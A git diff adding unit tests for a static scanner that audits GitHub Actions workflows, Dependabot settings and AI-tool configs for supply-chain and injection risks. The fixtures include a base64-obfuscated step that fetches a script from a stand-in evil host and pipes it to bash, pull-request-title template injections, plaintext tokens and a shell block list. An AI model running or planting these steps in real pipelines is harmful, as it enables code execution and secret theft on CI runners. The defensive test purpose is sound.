"actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-stale-action-refs"); + expect(findings[0]?.evidence).toContain("009b9ae9e446ad8d9b8c809870b0fbcc5e03573e"); + }); + + it("ignores commit pins that point to a tag", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async () => + makeResponse([ + { + commit: { + sha: "009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + }, + }, + ]), + ), + ); + + const findings = await detectWorkflowStaleActionRefs({ + filePath: ".github/workflows/ci.yml", + textContent: [ + "jobs:", + " build:", + " steps:", + " - uses: actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + "", + ].join("\n"), + parsed: { + on: ["pull_request"], + jobs: { + build: { + steps: [ + { + uses: "actions/checkout@009b9ae9e446ad8d9b8c809870b0fbcc5e03573e", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-superfluous-actions.test.ts b/tests/layer2/workflow-superfluous-actions.test.ts new file mode 100644 index 0000000..2c525dd --- /dev/null +++ b/tests/layer2/workflow-superfluous-actions.test.ts @@ -0,0 +1,41 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowSuperfluousActions } from "../../src/layer2-static/detectors/workflow-superfluous-actions"; + +describe("workflow superfluous actions detector", () => { + it("flags duplicate external action usage within the same job", () => { + const findings = detectWorkflowSuperfluousActions({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n - uses: actions/checkout@v4\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [{ uses: "actions/checkout@v4" }, { uses: "actions/checkout@v4" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-superfluous-actions"); + }); + + it("does not flag single-use actions", () => { + const findings = detectWorkflowSuperfluousActions({ + filePath: ".github/workflows/ci.yml", + textContent: `on: [push]\njobs:\n build:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n`, + parsed: { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + steps: [{ uses: "actions/checkout@v4" }], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-template-injection.test.ts b/tests/layer2/workflow-template-injection.test.ts new file mode 100644 index 0000000..dac1a51 --- /dev/null +++ b/tests/layer2/workflow-template-injection.test.ts @@ -0,0 +1,117 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow template injection detector", () => { + it("flags template expansion in run steps on untrusted triggers", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/pr.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["pull_request"], + jobs: { + test: { + steps: [ + { + run: "echo ${{ github.event.pull_request.title }}", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-template-injection")).toBe( + true, + ); + }); + + it("flags known action sink inputs containing template expansions", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/pr.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["pull_request"], + jobs: { + test: { + steps: [ + { + uses: "actions/github-script@v7", + with: { + script: "core.info('${{ github.event.pull_request.title }}')", + }, + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-template-injection")).toBe( + true, + ); + }); + + it("does not flag template expansion in trusted push-only workflows", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/push.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [ + { + run: "echo ${{ github.ref }}", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-template-injection")).toBe( + false, + ); + }); +}); diff --git a/tests/layer2/workflow-undocumented-permissions.test.ts b/tests/layer2/workflow-undocumented-permissions.test.ts new file mode 100644 index 0000000..b952532 --- /dev/null +++ b/tests/layer2/workflow-undocumented-permissions.test.ts @@ -0,0 +1,87 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUndocumentedPermissions } from "../../src/layer2-static/detectors/workflow-undocumented-permissions"; + +describe("workflow undocumented permissions detector", () => { + it("flags write permissions without comments", () => { + const textContent = `name: release +on: push +permissions: + contents: write +jobs: + publish: + runs-on: ubuntu-latest + permissions: + packages: write + steps: + - run: npm publish +`; + + const findings = detectWorkflowUndocumentedPermissions({ + filePath: ".github/workflows/release.yml", + parsed: { + on: ["push"], + permissions: { + contents: "write", + }, + jobs: { + publish: { + permissions: { + packages: "write", + }, + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings.length).toBeGreaterThan(0); + expect( + findings.some((finding) => finding.rule_id === "workflow-undocumented-permissions"), + ).toBe(true); + }); + + it("ignores documented permissions comments", () => { + const textContent = `name: release +on: push +permissions: # ok + contents: write # needed for release metadata +jobs: + publish: + runs-on: ubuntu-latest + permissions: + packages: write # needed to publish + steps: + - run: npm publish +`; + + const findings = detectWorkflowUndocumentedPermissions({ + filePath: ".github/workflows/release.yml", + parsed: { + on: ["push"], + permissions: { + contents: "write", + }, + jobs: { + publish: { + permissions: { + packages: "write", + }, + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unpinned-images.test.ts b/tests/layer2/workflow-unpinned-images.test.ts new file mode 100644 index 0000000..032ff10 --- /dev/null +++ b/tests/layer2/workflow-unpinned-images.test.ts @@ -0,0 +1,63 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnpinnedImages } from "../../src/layer2-static/detectors/workflow-unpinned-images"; + +describe("workflow unpinned images detector", () => { + it("flags workflow container and service images without immutable pins", () => { + const findings = detectWorkflowUnpinnedImages({ + filePath: ".github/workflows/images.yml", + textContent: [ + "jobs:", + " build:", + " container:", + " image: ghcr.io/acme/build", + " services:", + " redis:", + " image: redis:latest", + " pinned:", + " image: redis@sha256:7df1eeff67eb0ba84f6b9d2940765a6bb1158081426745c185a03b1507de6a09", + "", + ].join("\n"), + parsed: { + on: ["push"], + jobs: { + build: { + container: { + image: "ghcr.io/acme/build", + }, + services: { + redis: { + image: "redis:latest", + }, + pinned: { + image: + "redis@sha256:7df1eeff67eb0ba84f6b9d2940765a6bb1158081426745c185a03b1507de6a09", + }, + }, + }, + }, + }, + }); + + expect(findings).toHaveLength(2); + expect(findings.every((finding) => finding.rule_id === "workflow-unpinned-images")).toBe(true); + expect(findings[0]?.evidence).toMatch(/ghcr\.io\/acme\/build|redis:latest/); + }); + + it("ignores non-workflow files", () => { + const findings = detectWorkflowUnpinnedImages({ + filePath: "src/index.ts", + textContent: "", + parsed: { + jobs: { + build: { + container: { + image: "ghcr.io/acme/build", + }, + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unpinned-uses.test.ts b/tests/layer2/workflow-unpinned-uses.test.ts new file mode 100644 index 0000000..b574353 --- /dev/null +++ b/tests/layer2/workflow-unpinned-uses.test.ts @@ -0,0 +1,74 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "regular", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow unpinned uses detector", () => { + it("flags unpinned repository action refs", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["pull_request"], + jobs: { + test: { + steps: [{ uses: "actions/checkout@v4" }, { uses: "./.github/actions/local" }], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-unpinned-uses")).toBe(true); + }); + + it("does not flag hash-pinned refs", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml", + textContent: "", + parsed: { + on: ["push"], + jobs: { + test: { + steps: [ + { + uses: "actions/checkout@0123456789abcdef0123456789abcdef01234567", + }, + ], + }, + }, + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + expect(findings.some((finding) => finding.rule_id === "workflow-unpinned-uses")).toBe(false); + }); +}); diff --git a/tests/layer2/workflow-unredacted-secrets.test.ts b/tests/layer2/workflow-unredacted-secrets.test.ts new file mode 100644 index 0000000..f7d3707 --- /dev/null +++ b/tests/layer2/workflow-unredacted-secrets.test.ts @@ -0,0 +1,71 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnredactedSecrets } from "../../src/layer2-static/detectors/workflow-unredacted-secrets"; + +describe("workflow unredacted secrets detector", () => { + it("flags plaintext secret-like env values", () => { + const findings = detectWorkflowUnredactedSecrets({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + release: + runs-on: ubuntu-latest + steps: + - run: npm publish + env: + NPM_TOKEN: abc123plaintexttoken +`, + parsed: { + on: ["push"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + run: "npm publish", + env: { + NPM_TOKEN: "abc123plaintexttoken", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("unredacted-secrets"); + }); + + it("does not flag references to repository secrets", () => { + const findings = detectWorkflowUnredactedSecrets({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push] +jobs: + release: + runs-on: ubuntu-latest + steps: + - run: npm publish + env: + NPM_TOKEN: \${{ secrets.NPM_TOKEN }} +`, + parsed: { + on: ["push"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + run: "npm publish", + env: { + NPM_TOKEN: "${{ secrets.NPM_TOKEN }}", + }, + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unsound-condition.test.ts b/tests/layer2/workflow-unsound-condition.test.ts new file mode 100644 index 0000000..db8e038 --- /dev/null +++ b/tests/layer2/workflow-unsound-condition.test.ts @@ -0,0 +1,51 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnsoundCondition } from "../../src/layer2-static/detectors/workflow-unsound-condition"; + +describe("workflow unsound condition detector", () => { + it("flags always() conditions on sensitive execution steps", () => { + const findings = detectWorkflowUnsoundCondition({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - if: always()\n run: npm publish\n`, + parsed: { + on: ["push"], + jobs: { + publish: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "always()", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-unsound-condition"); + }); + + it("does not flag bounded conditions", () => { + const findings = detectWorkflowUnsoundCondition({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push]\njobs:\n publish:\n runs-on: ubuntu-latest\n steps:\n - if: success()\n run: npm publish\n`, + parsed: { + on: ["push"], + jobs: { + publish: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "success()", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-unsound-contains.test.ts b/tests/layer2/workflow-unsound-contains.test.ts new file mode 100644 index 0000000..6016c78 --- /dev/null +++ b/tests/layer2/workflow-unsound-contains.test.ts @@ -0,0 +1,51 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUnsoundContains } from "../../src/layer2-static/detectors/workflow-unsound-contains"; + +describe("workflow unsound contains detector", () => { + it("flags contains-based trust gates over untrusted pull request data", () => { + const findings = detectWorkflowUnsoundContains({ + filePath: ".github/workflows/release.yml", + textContent: `on: [pull_request]\njobs:\n release:\n runs-on: ubuntu-latest\n steps:\n - if: contains(github.event.pull_request.title, 'safe-to-release')\n run: npm publish\n`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "contains(github.event.pull_request.title, 'safe-to-release')", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-unsound-contains"); + }); + + it("does not flag contains checks over trusted refs", () => { + const findings = detectWorkflowUnsoundContains({ + filePath: ".github/workflows/release.yml", + textContent: `on: [push]\njobs:\n release:\n runs-on: ubuntu-latest\n steps:\n - if: contains(github.ref, 'refs/heads/main')\n run: npm publish\n`, + parsed: { + on: ["push"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + steps: [ + { + if: "contains(github.ref, 'refs/heads/main')", + run: "npm publish", + }, + ], + }, + }, + }, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-use-trusted-publishing.test.ts b/tests/layer2/workflow-use-trusted-publishing.test.ts new file mode 100644 index 0000000..fccf164 --- /dev/null +++ b/tests/layer2/workflow-use-trusted-publishing.test.ts @@ -0,0 +1,84 @@ +import { describe, expect, it } from "vitest"; +import { detectWorkflowUseTrustedPublishing } from "../../src/layer2-static/detectors/workflow-use-trusted-publishing"; + +describe("workflow trusted publishing detector", () => { + it("flags token-based npm publishing", () => { + const textContent = `name: release +on: + release: + types: [published] +jobs: + publish: + runs-on: ubuntu-latest + steps: + - run: npm publish + env: + NODE_AUTH_TOKEN: \${{ secrets.NPM_TOKEN }} +`; + + const findings = detectWorkflowUseTrustedPublishing({ + filePath: ".github/workflows/release.yml", + parsed: { + on: { + release: { + types: ["published"], + }, + }, + jobs: { + publish: { + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(1); + expect(findings[0]?.rule_id).toBe("workflow-use-trusted-publishing"); + expect(findings[0]?.evidence).toContain("npm publish"); + }); + + it("does not flag publish steps that already use id-token auth", () => { + const textContent = `name: release +on: + release: + types: [published] +jobs: + publish: + permissions: + id-token: write + steps: + - run: npm publish +`; + + const findings = detectWorkflowUseTrustedPublishing({ + filePath: ".github/workflows/release.yml", + parsed: { + on: { + release: { + types: ["published"], + }, + }, + jobs: { + publish: { + permissions: { + "id-token": "write", + }, + steps: [ + { + run: "npm publish", + }, + ], + }, + }, + }, + textContent, + }); + + expect(findings).toHaveLength(0); + }); +}); diff --git a/tests/layer2/workflow-wave-b-engine.test.ts b/tests/layer2/workflow-wave-b-engine.test.ts new file mode 100644 index 0000000..fe1444b --- /dev/null +++ b/tests/layer2/workflow-wave-b-engine.test.ts @@ -0,0 +1,128 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "auditor", + runtimeMode: "online", + workflowAuditsEnabled: true, +}; + +function buildWorkflowFixture() { + const textContent = [ + "name: ci", + "on: [push]", + "jobs:", + " build:", + " runs-on: ubuntu-latest", + " container:", + " image: node:latest", + " steps:", + " - uses: actions/setup-ruby@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", + " - uses: actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", + " - uses: actions/cache@cccccccccccccccccccccccccccccccccccccccc # v3.0.0", + "", + ].join("\n"); + + const parsed = { + on: ["push"], + jobs: { + build: { + "runs-on": "ubuntu-latest", + container: { + image: "node:latest", + }, + steps: [ + { uses: "actions/setup-ruby@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" }, + { uses: "actions/checkout@bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" }, + { uses: "actions/cache@cccccccccccccccccccccccccccccccccccccccc" }, + ], + }, + }, + }; + + return { textContent, parsed }; +} + +describe("workflow wave B engine integration", () => { + afterEach(() => { + vi.unstubAllGlobals(); + vi.restoreAllMocks(); + }); + + it("surfaces Wave B findings through runStaticEngine in online mode", async () => { + vi.stubGlobal( + "fetch", + vi.fn(async (input: string | URL) => { + const url = String(input); + + if (url.includes("/repos/actions/setup-ruby")) { + return new Response(JSON.stringify({ archived: true }), { + status: 200, + headers: { "content-type": "application/json" }, + }); + } + + if (url.includes("/repos/actions/checkout/tags")) { + return new Response(JSON.stringify([]), { + status: 200, + headers: { "content-type": "application/json" }, + }); + } + + if (url.includes("/repos/actions/cache/git/ref/tags/v3.0.0")) { + return new Response( + JSON.stringify({ + object: { + type: "commit", + sha: "dddddddddddddddddddddddddddddddddddddddd", + }, + }), + { + status: 200, + headers: { "content-type": "application/json" }, + }, + ); + } + + if (url.includes("/repos/actions/checkout/commits/")) { + return new Response("not found", { status: 404 }); + } + + return new Response("not found", { status: 404 }); + }), + ); + + const fixture = buildWorkflowFixture(); + + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/ci.yml", + format: "yaml", + parsed: fixture.parsed, + textContent: fixture.textContent, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + + expect(ruleIds.has("workflow-archived-uses")).toBe(true); + expect(ruleIds.has("workflow-stale-action-refs")).toBe(true); + expect(ruleIds.has("workflow-ref-version-mismatch")).toBe(true); + expect(ruleIds.has("workflow-impostor-commit")).toBe(true); + expect(ruleIds.has("workflow-unpinned-images")).toBe(true); + }); +}); diff --git a/tests/layer2/workflow-wave-cde-engine.test.ts b/tests/layer2/workflow-wave-cde-engine.test.ts new file mode 100644 index 0000000..425ec39 --- /dev/null +++ b/tests/layer2/workflow-wave-cde-engine.test.ts @@ -0,0 +1,121 @@ +import { describe, expect, it } from "vitest"; +import { runStaticEngine, type StaticEngineConfig } from "../../src/layer2-static/engine"; + +const BASE_CONFIG: StaticEngineConfig = { + knownSafeMcpServers: [], + knownSafeFormatters: [], + knownSafeLspServers: [], + knownSafeHooks: [], + blockedCommands: ["bash", "sh"], + trustedApiDomains: [], + unicodeAnalysis: true, + checkIdeSettings: true, + persona: "auditor", + runtimeMode: "offline", + workflowAuditsEnabled: true, +}; + +describe("workflow wave C/D/E engine integration", () => { + it("surfaces newly added Wave C/D/E audit findings through runStaticEngine", async () => { + const findings = await runStaticEngine({ + projectRoot: "/tmp/project", + files: [ + { + filePath: ".github/workflows/release.yml", + format: "yaml", + textContent: `on: [pull_request] +jobs: + release: + runs-on: ubuntu-latest + container: + image: ghcr.io/user:pass@ghcr.io/org/private-image:latest + steps: + - if: github.actor == 'dependabot[bot]' + run: npm publish + - if: always() + run: npm publish + - if: contains(github.event.pull_request.title, 'safe') + run: npm publish + - run: echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash + - run: npm publish + env: + NPM_TOKEN: abc123plaintexttoken +`, + parsed: { + on: ["pull_request"], + jobs: { + release: { + "runs-on": "ubuntu-latest", + container: { + image: "ghcr.io/user:pass@ghcr.io/org/private-image:latest", + }, + steps: [ + { + if: "github.actor == 'dependabot[bot]'", + run: "npm publish", + }, + { + if: "always()", + run: "npm publish", + }, + { + if: "contains(github.event.pull_request.title, 'safe')", + run: "npm publish", + }, + { + run: 'echo "Y3VybCAtZnNTTCBodHRwczovL2V2aWwuZXhhbXBsZS9wLnNoIHwgc2g=" | base64 -d | bash', + }, + { + run: "npm publish", + env: { + NPM_TOKEN: "abc123plaintexttoken", + }, + }, + ], + }, + }, + }, + }, + { + filePath: ".github/dependabot.yml", + format: "yaml", + textContent: `version: 2 +updates: + - package-ecosystem: npm + directory: / + schedule: + interval: daily + insecure-external-code-execution: allow +`, + parsed: { + version: 2, + updates: [ + { + "package-ecosystem": "npm", + directory: "/", + schedule: { + interval: "daily", + }, + "insecure-external-code-execution": "allow", + }, + ], + }, + }, + ], + symlinkEscapes: [], + hooks: [], + config: BASE_CONFIG, + }); + + const ruleIds = new Set(findings.map((finding) => finding.rule_id)); + expect(ruleIds.has("workflow-anonymous-definition")).toBe(true); + expect(ruleIds.has("workflow-obfuscation")).toBe(true); + expect(ruleIds.has("workflow-unsound-condition")).toBe(true); + expect(ruleIds.has("workflow-unsound-contains")).toBe(true); + expect(ruleIds.has("hardcoded-container-credentials")).toBe(true); + expect(ruleIds.has("unredacted-secrets")).toBe(true); + expect(ruleIds.has("bot-conditions")).toBe(true); + expect(ruleIds.has("dependabot-cooldown")).toBe(true); + expect(ruleIds.has("dependabot-execution")).toBe(true); + }); +}); diff --git a/tests/meta/workflow-audit-parity-contract.test.ts b/tests/meta/workflow-audit-parity-contract.test.ts new file mode 100644 index 0000000..d8f2585 --- /dev/null +++ b/tests/meta/workflow-audit-parity-contract.test.ts @@ -0,0 +1,61 @@ +import { existsSync, readFileSync } from "node:fs"; +import { resolve } from "node:path"; +import { describe, expect, it } from "vitest"; + +const root = resolve(process.cwd()); +const checklistPath = resolve(root, "docs/workflow-audit-parity-checklist.md"); + +const expectedCheckedAuditIds = [ + "dangerous-triggers", + "excessive-permissions", + "known-vulnerable-actions", + "template-injection", + "unpinned-uses", + "artipacked", + "cache-poisoning", + "github-env", + "insecure-commands", + "self-hosted-runner", + "overprovisioned-secrets", + "secrets-outside-env", + "secrets-inherit", + "use-trusted-publishing", + "undocumented-permissions", + "archived-uses", + "stale-action-refs", + "forbidden-uses", + "ref-confusion", + "ref-version-mismatch", + "impostor-commit", + "unpinned-images", + "anonymous-definition", + "concurrency-limits", + "superfluous-actions", + "misfeature", + "obfuscation", + "unsound-condition", + "unsound-contains", + "dependabot-cooldown", + "dependabot-execution", + "hardcoded-container-credentials", + "unredacted-secrets", + "bot-conditions", +] as const; + +function readChecklist(): string { + return readFileSync(checklistPath, "utf8"); +} + +describe("workflow audit parity checklist contract", () => { + it("exists at the documented location", () => { + expect(existsSync(checklistPath)).toBe(true); + }); + + it("marks every currently implemented workflow audit id as checked", () => { + const checklist = readChecklist(); + + for (const auditId of expectedCheckedAuditIds) { + expect(checklist).toContain(`- [x] \`${auditId}\``); + } + }); +}); diff --git a/tests/pipeline/static-pipeline.test.ts b/tests/pipeline/static-pipeline.test.ts index 17d768f..4ba2a3c 100644 --- a/tests/pipeline/static-pipeline.test.ts +++ b/tests/pipeline/static-pipeline.test.ts @@ -2,8 +2,8 @@ import { describe, expect, it } from "vitest"; import { runStaticPipeline } from "../../src/pipeline"; describe("task 14 static pipeline orchestration", () => { - it("deduplicates repeated threats across files and preserves affected locations", () => { - const report = runStaticPipeline({ + it("deduplicates repeated threats across files and preserves affected locations", async () => { + const report = await runStaticPipeline({ version: "0.1.0", kbVersion: "2026-02-28", scanTarget: ".", diff --git a/tests/report/finding-fingerprint.test.ts b/tests/report/finding-fingerprint.test.ts index 7726d77..b8bc736 100644 --- a/tests/report/finding-fingerprint.test.ts +++ b/tests/report/finding-fingerprint.test.ts @@ -50,8 +50,8 @@ describe("finding fingerprints", () => { expect(buildFindingFingerprint(base)).not.toBe(buildFindingFingerprint(moved)); }); - it("stamps fingerprints onto findings returned by the pipeline", () => { - const report = runStaticPipeline({ + it("stamps fingerprints onto findings returned by the pipeline", async () => { + const report = await runStaticPipeline({ version: "0.1.0", kbVersion: "2026-02-28", scanTarget: ".", diff --git a/tests/reporter/sarif.test.ts b/tests/reporter/sarif.test.ts index feeeec7..31084fe 100644 --- a/tests/reporter/sarif.test.ts +++ b/tests/reporter/sarif.test.ts @@ -20,6 +20,12 @@ describe("task 15 sarif reporter", () => { layer: "L2", file_path: ".claude/settings.json", location: { field: "env.ANTHROPIC_BASE_URL", line: 2 }, + affected_locations: [ + { + file_path: ".claude/settings.json", + location: { field: "mcpServers.bad.command", line: 9, column: 3 }, + }, + ], description: "Untrusted endpoint", affected_tools: ["claude-code"], cve: "CVE-2026-21852", @@ -51,7 +57,11 @@ describe("task 15 sarif reporter", () => { version: string; runs: Array<{ tool: { driver: { rules: Array<{ id: string }> } }; - results: Array<{ ruleId: string; properties?: Record }>; + results: Array<{ + ruleId: string; + properties?: Record; + relatedLocations?: Array; + }>; }>; }; @@ -67,5 +77,6 @@ describe("task 15 sarif reporter", () => { sinks: ["api-redirect"], origin: "sarif-reporter-test", }); + expect(sarif.runs[0]?.results[0]?.relatedLocations?.length).toBe(1); }); }); diff --git a/tests/reporter/terminal.test.ts b/tests/reporter/terminal.test.ts index acf4945..923e74a 100644 --- a/tests/reporter/terminal.test.ts +++ b/tests/reporter/terminal.test.ts @@ -70,6 +70,16 @@ describe("task 15 terminal reporter", () => { layer: "L2", file_path: ".mcp.json", location: { field: "mcpServers.bad.command", line: 12, column: 9 }, + affected_locations: [ + { + file_path: ".mcp.json", + location: { field: "mcpServers.bad.args", line: 14, column: 11 }, + }, + { + file_path: ".cursor/mcp.json", + location: { field: "mcpServers.bad.command", line: 3, column: 5 }, + }, + ], description: "Potential command execution from project MCP server", affected_tools: ["claude-code"], cve: "CVE-2025-61260", @@ -105,6 +115,7 @@ describe("task 15 terminal reporter", () => { expect(output).toContain("CVE: CVE-2025-61260"); expect(output).toContain("OWASP: ASI02, ASI05"); expect(output).toContain("Metadata:"); + expect(output).toContain("Affected locations:"); expect(output).toContain("Sources:"); expect(output).toContain("Risk tags:"); });